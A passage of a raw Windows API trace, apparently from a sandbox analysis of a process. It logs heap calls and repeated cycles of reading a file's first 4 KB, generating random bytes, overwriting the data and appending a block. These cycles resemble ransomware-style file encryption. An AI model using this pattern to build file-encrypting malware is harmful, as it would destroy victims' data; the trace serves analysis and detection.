returned 0x4f10000 [0076.620] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.620] GetProcessHeap () returned 0x4f10000 [0076.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.620] GetProcessHeap () returned 0x4f10000 [0076.620] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.620] GetProcessHeap () returned 0x4f10000 [0076.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0076.621] GetProcessHeap () returned 0x4f10000 [0076.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0076.622] GetProcessHeap () returned 0x4f10000 [0076.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0076.622] GetProcessHeap () returned 0x4f10000 [0076.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0076.622] GetProcessHeap () returned 0x4f10000 [0076.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0076.622] GetProcessHeap () returned 0x4f10000 [0076.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0076.622] GetProcessHeap () returned 0x4f10000 [0076.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.622] GetProcessHeap () returned 0x4f10000 [0076.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0076.622] GetProcessHeap () returned 0x4f10000 [0076.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.622] GetProcessHeap () returned 0x4f10000 [0076.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.622] GetProcessHeap () returned 0x4f10000 [0076.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.622] GetProcessHeap () returned 0x4f10000 [0076.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.622] GetProcessHeap () returned 0x4f10000 [0076.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.622] GetProcessHeap () returned 0x4f10000 [0076.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.622] GetProcessHeap () returned 0x4f10000 [0076.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.622] GetProcessHeap () returned 0x4f10000 [0076.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.622] GetProcessHeap () returned 0x4f10000 [0076.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.623] GetProcessHeap () returned 0x4f10000 [0076.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.623] GetProcessHeap () returned 0x4f10000 [0076.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.623] GetProcessHeap () returned 0x4f10000 [0076.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.623] GetProcessHeap () returned 0x4f10000 [0076.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.623] GetProcessHeap () returned 0x4f10000 [0076.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.623] GetProcessHeap () returned 0x4f10000 [0076.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.623] GetProcessHeap () returned 0x4f10000 [0076.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.623] GetProcessHeap () returned 0x4f10000 [0076.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.623] GetProcessHeap () returned 0x4f10000 [0076.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.623] GetProcessHeap () returned 0x4f10000 [0076.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.623] GetProcessHeap () returned 0x4f10000 [0076.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.623] GetProcessHeap () returned 0x4f10000 [0076.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.623] GetProcessHeap () returned 0x4f10000 [0076.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.623] GetProcessHeap () returned 0x4f10000 [0076.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.624] GetProcessHeap () returned 0x4f10000 [0076.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.624] GetProcessHeap () returned 0x4f10000 [0076.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0076.624] GetProcessHeap () returned 0x4f10000 [0076.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.624] GetProcessHeap () returned 0x4f10000 [0076.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0076.624] GetProcessHeap () returned 0x4f10000 [0076.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0076.624] GetProcessHeap () returned 0x4f10000 [0076.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.624] GetProcessHeap () returned 0x4f10000 [0076.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0076.624] SetFilePointerEx (in: hFile=0x7c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.624] WriteFile (in: hFile=0x7c4, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0076.624] WriteFile (in: hFile=0x7c4, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0076.624] GetProcessHeap () returned 0x4f10000 [0076.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0076.624] GetProcessHeap () returned 0x4f10000 [0076.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0076.624] GetProcessHeap () returned 0x4f10000 [0076.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0076.624] CloseHandle (hObject=0x7c4) returned 1 [0076.625] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 12 [0076.625] SetFilePointerEx (in: hFile=0x77c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.625] ReadFile (in: hFile=0x77c, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0076.625] SetFilePointerEx (in: hFile=0x77c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.625] GetProcessHeap () returned 0x4f10000 [0076.625] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0076.625] GetProcessHeap () returned 0x4f10000 [0076.625] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0076.625] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0076.625] GetProcessHeap () returned 0x4f10000 [0076.625] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0076.625] ReadFile (in: hFile=0x77c, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0076.694] SetFilePointerEx (in: hFile=0x77c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.694] WriteFile (in: hFile=0x77c, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0076.694] GetProcessHeap () returned 0x4f10000 [0076.694] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0076.694] GetProcessHeap () returned 0x4f10000 [0076.694] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.694] GetProcessHeap () returned 0x4f10000 [0076.694] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d560a0 [0076.694] GetProcessHeap () returned 0x4f10000 [0076.694] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.694] GetProcessHeap () returned 0x4f10000 [0076.694] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0076.694] GetProcessHeap () returned 0x4f10000 [0076.694] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.694] GetProcessHeap () returned 0x4f10000 [0076.694] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.694] GetProcessHeap () returned 0x4f10000 [0076.694] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.694] GetProcessHeap () returned 0x4f10000 [0076.694] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.694] GetProcessHeap () returned 0x4f10000 [0076.694] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.694] GetProcessHeap () returned 0x4f10000 [0076.694] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.694] GetProcessHeap () returned 0x4f10000 [0076.694] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.694] GetProcessHeap () returned 0x4f10000 [0076.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.695] GetProcessHeap () returned 0x4f10000 [0076.695] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.695] GetProcessHeap () returned 0x4f10000 [0076.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.695] GetProcessHeap () returned 0x4f10000 [0076.695] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.695] GetProcessHeap () returned 0x4f10000 [0076.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.695] GetProcessHeap () returned 0x4f10000 [0076.695] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.695] GetProcessHeap () returned 0x4f10000 [0076.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.695] GetProcessHeap () returned 0x4f10000 [0076.695] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.695] GetProcessHeap () returned 0x4f10000 [0076.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.695] GetProcessHeap () returned 0x4f10000 [0076.695] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.695] GetProcessHeap () returned 0x4f10000 [0076.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.695] GetProcessHeap () returned 0x4f10000 [0076.695] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.695] GetProcessHeap () returned 0x4f10000 [0076.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.695] GetProcessHeap () returned 0x4f10000 [0076.695] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.695] GetProcessHeap () returned 0x4f10000 [0076.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.695] GetProcessHeap () returned 0x4f10000 [0076.695] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.695] GetProcessHeap () returned 0x4f10000 [0076.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.695] GetProcessHeap () returned 0x4f10000 [0076.695] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.695] GetProcessHeap () returned 0x4f10000 [0076.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.696] GetProcessHeap () returned 0x4f10000 [0076.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.696] GetProcessHeap () returned 0x4f10000 [0076.696] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.696] GetProcessHeap () returned 0x4f10000 [0076.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.696] GetProcessHeap () returned 0x4f10000 [0076.696] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.696] GetProcessHeap () returned 0x4f10000 [0076.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.696] GetProcessHeap () returned 0x4f10000 [0076.696] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.696] GetProcessHeap () returned 0x4f10000 [0076.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.696] GetProcessHeap () returned 0x4f10000 [0076.696] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0076.696] GetProcessHeap () returned 0x4f10000 [0076.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.696] GetProcessHeap () returned 0x4f10000 [0076.696] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0076.696] GetProcessHeap () returned 0x4f10000 [0076.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0076.696] GetProcessHeap () returned 0x4f10000 [0076.696] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0076.696] GetProcessHeap () returned 0x4f10000 [0076.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0076.696] GetProcessHeap () returned 0x4f10000 [0076.696] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0076.696] GetProcessHeap () returned 0x4f10000 [0076.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0076.696] GetProcessHeap () returned 0x4f10000 [0076.696] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.696] GetProcessHeap () returned 0x4f10000 [0076.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0076.696] GetProcessHeap () returned 0x4f10000 [0076.696] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.697] GetProcessHeap () returned 0x4f10000 [0076.697] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.697] GetProcessHeap () returned 0x4f10000 [0076.697] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.697] GetProcessHeap () returned 0x4f10000 [0076.697] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.697] GetProcessHeap () returned 0x4f10000 [0076.697] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.697] GetProcessHeap () returned 0x4f10000 [0076.697] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.697] GetProcessHeap () returned 0x4f10000 [0076.697] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.697] GetProcessHeap () returned 0x4f10000 [0076.697] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.697] GetProcessHeap () returned 0x4f10000 [0076.697] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.697] GetProcessHeap () returned 0x4f10000 [0076.697] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.697] GetProcessHeap () returned 0x4f10000 [0076.697] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.697] GetProcessHeap () returned 0x4f10000 [0076.697] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.697] GetProcessHeap () returned 0x4f10000 [0076.697] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.697] GetProcessHeap () returned 0x4f10000 [0076.697] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.697] GetProcessHeap () returned 0x4f10000 [0076.697] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.698] GetProcessHeap () returned 0x4f10000 [0076.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.698] GetProcessHeap () returned 0x4f10000 [0076.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.698] GetProcessHeap () returned 0x4f10000 [0076.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.698] GetProcessHeap () returned 0x4f10000 [0076.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.698] GetProcessHeap () returned 0x4f10000 [0076.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.698] GetProcessHeap () returned 0x4f10000 [0076.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.698] GetProcessHeap () returned 0x4f10000 [0076.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.698] GetProcessHeap () returned 0x4f10000 [0076.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.698] GetProcessHeap () returned 0x4f10000 [0076.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.698] GetProcessHeap () returned 0x4f10000 [0076.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0076.698] GetProcessHeap () returned 0x4f10000 [0076.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.698] GetProcessHeap () returned 0x4f10000 [0076.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0076.698] GetProcessHeap () returned 0x4f10000 [0076.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0076.698] GetProcessHeap () returned 0x4f10000 [0076.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.698] GetProcessHeap () returned 0x4f10000 [0076.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0076.699] SetFilePointerEx (in: hFile=0x77c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.699] WriteFile (in: hFile=0x77c, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0076.699] WriteFile (in: hFile=0x77c, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0076.699] GetProcessHeap () returned 0x4f10000 [0076.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0076.699] GetProcessHeap () returned 0x4f10000 [0076.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0076.699] GetProcessHeap () returned 0x4f10000 [0076.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0076.699] CloseHandle (hObject=0x77c) returned 1 [0076.700] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 13 [0076.700] SetFilePointerEx (in: hFile=0x780, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.700] ReadFile (in: hFile=0x780, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0076.700] SetFilePointerEx (in: hFile=0x780, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.700] GetProcessHeap () returned 0x4f10000 [0076.700] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0076.701] 